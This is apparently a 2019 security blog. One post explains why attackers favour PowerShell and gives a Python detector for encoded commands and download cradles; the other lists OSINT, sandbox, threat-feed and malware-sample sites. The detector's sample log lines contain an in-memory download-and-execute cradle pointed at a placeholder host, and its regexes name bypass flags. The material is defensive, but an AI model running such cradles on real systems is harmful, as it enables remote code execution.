Saturday, 23 November 2019

The increased use of PowerShell in attacks

The top 10 reasons why attackers use PowerShell

1. It is installed by default on all new Windows computers.
2. It can execute payloads directly from memory, making it stealthy.
3. It generates few traces by default, making it difficult to find under forensic analysis.
4. It has remote access capabilities by default with encrypted traffic.
5. As a script, it is easy to obfuscate and difficult to detect with traditional security tools.
6. Defenders often overlook it when hardening their systems.
7. It can bypass application-whitelisting tools depending on the configuration.
8. Many gateway sandboxes do not handle script-based malware well.
9. It has a growing community with readily available scripts.
10. Many system administrators use and trust the framework, allowing PowerShell malware to blend in with regular administration work.
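Reasons 2, 3 and 5 above are the ones a defender can act on directly: the "few traces" only holds while script block logging is off (with it enabled, PowerShell 5+ writes the de-obfuscated script to the Microsoft-Windows-PowerShell/Operational log as event 4104), and an `-EncodedCommand` payload is just UTF-16LE text in base64. The triage helper below is an added example, not code from the post or its references; it decodes such payloads and flags common indicators in constructed command lines. The indicator list, sample lines and the `example.invalid` host are assumptions made for the demonstration.

```python
"""Triage PowerShell command lines from process-creation or script-block logs.

Added example: the regexes and the SAMPLE_LOG entries are constructed for
this demonstration and are not taken from the original post.
"""
import base64
import re
from typing import Optional

# Indicators that often accompany PowerShell misuse, keyed by a short name.
# Assumption: this list is illustrative, not a complete detection rule set.
INDICATORS = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE),
    "bypass_policy": re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.IGNORECASE),
    "download_cradle": re.compile(
        r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b)",
        re.IGNORECASE,
    ),
    "in_memory_exec": re.compile(r"(?:\biex\b|invoke-expression)", re.IGNORECASE),
}

# Captures the base64 argument that follows any spelling of -EncodedCommand.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none.

    PowerShell expects the argument to be base64 over UTF-16LE text, which is
    why a plain base64 decode of it looks like text with NUL bytes in between.
    """
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64/UTF-16LE: leave it for manual review.
        return None


def triage(cmdline: str) -> dict:
    """Score one command line: decode any encoded payload, then match indicators
    against both the raw line and the decoded script."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + (" " + decoded if decoded else "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"indicators": hits, "decoded": decoded, "score": len(hits)}


# Constructed sample payload: the classic in-memory download cradle, encoded
# the way PowerShell expects it (UTF-16LE, then base64).
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b.ps1')"
ENCODED_SAMPLE = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed log lines (not real telemetry): benign admin use, a plain-text
# cradle with a hidden window, and the same cradle hidden behind -EncodedCommand.
SAMPLE_LOG = [
    "powershell.exe Get-Service -Name Spooler",
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a.ps1')\"",
    "powershell.exe -ep bypass -EncodedCommand " + ENCODED_SAMPLE,
]


def triage_log(lines) -> list:
    """Triage every line and return the results in input order."""
    return [triage(line) for line in lines]


if __name__ == "__main__":
    for line, result in zip(SAMPLE_LOG, triage_log(SAMPLE_LOG)):
        print(f"score={result['score']} indicators={result['indicators']}")
        if result["decoded"]:
            print(f"  decoded: {result['decoded']}")
```

The third sample shows why decoding matters: on the raw line only the `-ep bypass` and `-EncodedCommand` switches are visible, and the download cradle appears only after the payload is decoded. In practice the same logic runs over Sysmon event 1 or Security event 4688 command lines, or directly over the script text in event 4104 where script block logging is on.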

Fileless attacks


References:
Real full guide here!
https://www.crowdstrike.com/blog/blocking-malicious-powershell-downloads/
https://bensanchez.jp/fileless-malware-obfuscating-malware-using-powershell-scripts/
https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
https://www.mcafee.com/enterprise/es-es/security-awareness/ransomware/what-is-fileless-malware.html

Sunday, 10 November 2019

Useful OSINT Tools for Cyber Threat Hunting and Analysis



While working on security incident analysis we frequently use various online platforms, paid and free, for malware analysis, threat intelligence, security event analysis, analysis of network traffic of unknown origin, checking IoC information and the like. These platforms give CSIRT staff the means to understand and analyse such incidents better: sometimes to make sense of a threat, sometimes to look up who owns a domain, sometimes to learn about a spear phishing campaign that has started, wherever it originates. I too make use of these tools from time to time during analysis, as far as they make my work easier. Taking OSINT by its definition: obtaining information about a target through research over sources open to everyone is called open source intelligence (OSINT). My aim in writing this post is to compile this list of the tools I use frequently, so that visitors to my blog can also benefit from any tool they have not yet used in their own analyses. I hope it is useful. The image below about OSINT points, via the domain in the link, to what we can actually draw on when doing OSINT. You can visit it for more detail and explore it by clicking on the bubbles.

    Automated Analysis/Sandboxes:


    • https://app.any.run
    • https://analyze.intezer.com/
    • https://www.hybrid-analysis.com/
    • https://www.virustotal.com/gui/home/upload
    • https://app.sndbox.com/
    • https://cuckoo.cert.ee/
    • https://cape.contextis.com/
    • https://sandbox.anlyz.io/dashboard
    • https://valkyrie.comodo.com
    • http://cloud.iobit.com
    • https://detux.org/index.php
    • https://quicksand.io/
    • https://totalhash.cymru.com/upload/
    • https://x.threatbook.cn/about
    • https://nodistribute.com/
    • https://vicheck.com/submitfile.php
    Threat Intelligence/Research:
    • https://mxtoolbox.com/
    • https://dnsdumpster.com/
    • https://censys.io/
    • https://findsubdomains.com/
    • https://publicwww.com/
    • https://apt.threattracking.com/
    • https://pan-unit42.github.io/playbook_viewer
    • https://www.binaryedge.io/
    • https://www.shodan.io/
    • https://exchange.xforce.ibmcloud.com/
    • https://www.threatminer.org/
    • https://otx.alienvault.com/
    • https://community.riskiq.com/home
    • https://talosintelligence.com/
    • https://pulsedive.com/
    • https://ui.threatstream.com/login?redirect=%2Fdashboard
    • https://threatpoint.checkpoint.com/ThreatPortal/emulation
    • https://analyze.intezer.com/#/
    • https://threatintelligenceplatform.com/
    Reputation Lookup Tools (IP/Hash/URL/MAC/SSL/DNS/SEO):
    • https://totalhash.cymru.com/
    • https://www.scumware.org/search.php
    • http://sitereview.bluecoat.com
    • https://zulu.zscaler.com/
    • https://urlscan.io/
    • http://app.webinspector.com/
    • https://www.threatcrowd.org/
    • https://www.brightcloud.com/tools/url-ip-lookup.php
    • http://www.ipvoid.com/
    • https://crt.sh/
    • https://dnslytics.com/
    • https://metadefender.opswat.com/
    • https://exonerator.torproject.org/
    • https://developers.whatismybrowser.com
    • https://macvendors.com
    • https://www.abuseipdb.com/
    • https://centralops.net/co/DomainDossier.aspx
    • http://whois.domaintools.com/
    • https://tools.wmflabs.org/whois/gateway.py?
    • https://urlfiltering.paloaltonetworks.com  
    • https://csi.forcepoint.com/
    • https://fortiguard.com/webfilter
    • http://urlquery.net/
    • https://sitecheck.sucuri.net
    • https://community.riskiq.com/search/
    • https://metadefender.opswat.com/#!/scan-file
    • https://cymon.io/
    • https://www.malwareurl.com/listing-urls.php
    • https://talosintelligence.com/reputation_center/email_rep
    • https://www.threatminer.org/
    • https://spyse.com/search/certificate
    • http://bs.org.tr/phishing-domain-list
    • https://www.echotrail.io/insights/search/
    • https://www.robtex.com/dns-lookup/
    • http://moonsearch.com/
    • https://www.malwares.com/search/tag?tag=ransomware

    Miscellaneous Tools:
    • https://gchq.github.io/CyberChef/
    • https://onlinedisassembler.com/odaweb/
    • https://start.me/p/rxRbpo/ti
    • https://malshare.com/
    • https://iplogger.org/
    • https://shrib.com/
    • https://www.itextpad.com/
    • https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx
    • https://maltiverse.com/search
    • http://moonsearch.com/
    • https://labs.inquest.net/
    • http://www.urlvir.com/

    Online Test Tools:
      • https://www.browserling.com/
      • https://visualping.io/
      • https://ping.eu/
      • https://www.uptrends.com/tools/uptime
      • https://urlscan.io/
      • https://centralops.net/co/
      • https://trumail.io/
      • https://builtwith.com/


      Security Blogs/News:


      • https://malware-traffic-analysis.net/
      • https://broadanalysis.net/
      • https://blog.malwarebytes.com/
      • https://myonlinesecurity.co.uk/
      • https://cofense.com/blog/
      • https://threatpost.com/blog/
      • https://krebsonsecurity.com/
      • https://blog.trendmicro.com/trendlabs-security-intelligence/
      • https://unit42.paloaltonetworks.com/
      • https://blog.paloaltonetworks.com/
      • https://www.zscaler.com/blogs/research
      • https://securelist.com/
      • https://www.wired.com/category/threatlevel/
      • https://www.proofpoint.com/us/blog
      • https://www.sentinelone.com/blog/
      • https://www.zdnet.com/
      • https://thehackernews.com/
      • https://www.bleepingcomputer.com/
      • https://www.flashpoint-intel.com/blog/
      • https://research.checkpoint.com/
      • https://blogs.cisco.com/security
      • https://www.cyberbit.com/blog/
      • https://www.fireeye.com/blog.html
      • https://nakedsecurity.sophos.com/
      • https://isc.sans.edu
      Malware/Threat Analysis Tools:
      • https://www.packettotal.com/
      • https://www.networktotal.com/analysis.phtml
      • https://avcaesar.malware.lu/
      • https://x.threatbook.cn/about
      • https://www.randhome.io/blog/2018/02/23/harpoon-an-osint-/-threat-intelligence-tool/

      Brand Protection:
      • https://services.normshield.com/phishing-domain-search
      • https://www.normshield.com/rapid-cyber-risk-scorecard/
      • http://bs.org.tr/phishing-domain-list
      • https://www.immuniweb.com/radar/?id=eQrS38Ky
      • https://builtwith.com/

      DeepWeb:
      • https://darknetlive.com/
      • https://github.com/CHEF-KOCH/ProjectX
      • https://www.tor2web.org/
      • https://fproxy.net/
      • https://xmrchain.net/


      Threat Feeds:

      • https://urlhaus.abuse.ch/
      • https://ransomwaretracker.abuse.ch/
      • https://threatfeeds.io/
      • https://phishstats.info/
      • https://infosec.cert-pa.it/analyze/listdomains.txt

      DDoS & Attack Monitoring:
      • https://ddosmon.net/
      • https://www.digitalattackmap.com/
      • https://horizon.netscout.com/
      • https://threatmap.checkpoint.com/
      • https://cybermap.kaspersky.com/
      • https://threatmap.fortiguard.com/
      • https://www.fireeye.com/cyber-map/threat-map.html
      • https://threatmap.bitdefender.com/
      • https://map.lookingglasscyber.com/
      • http://www.parsecuremap.com/#2/42.3/-17.7
      • https://securitycenter.sonicwall.com/m/page/worldwide-attacks

      Source Code Analysis:

      Passive DNS Data:
      • https://securitytrails.com/dns-trails#/
      • https://passivedns.mnemonic.no/search
      • http://ptrarchive.com/
      • https://www.d4-project.org/
      • http://research.domaintools.com/research/hosting-history/
      • https://completedns.com/dns-history/
      • https://whoisrequest.com/
      • https://www.deteque.com/news/passive-dns/
      Certificate Fingerprint:



      Malicious Samples:

      • https://malshare.com/index.php
      • https://malquarium.org/
      • https://virusshare.com/


      Yara Rules:

      • https://github.com/kevthehermit/YaraRules


      Twitter Intelligence:

      • http://tweettioc.com/search

      Malware Tracker:

      • http://malwares.com
      • http://vxvault.net/ViriList.php

      Sigma Rules:
      Lookup Tools:


      • https://www.ultratools.com/tools/spamDBLookup
      • https://mxtoolbox.com/blacklists.aspx
      • https://w3dt.net/tools/dnsbl
      • https://www.abuseipdb.com/
      • https://apility.io/
      • https://megritools.com/blacklist-lookup

      References:
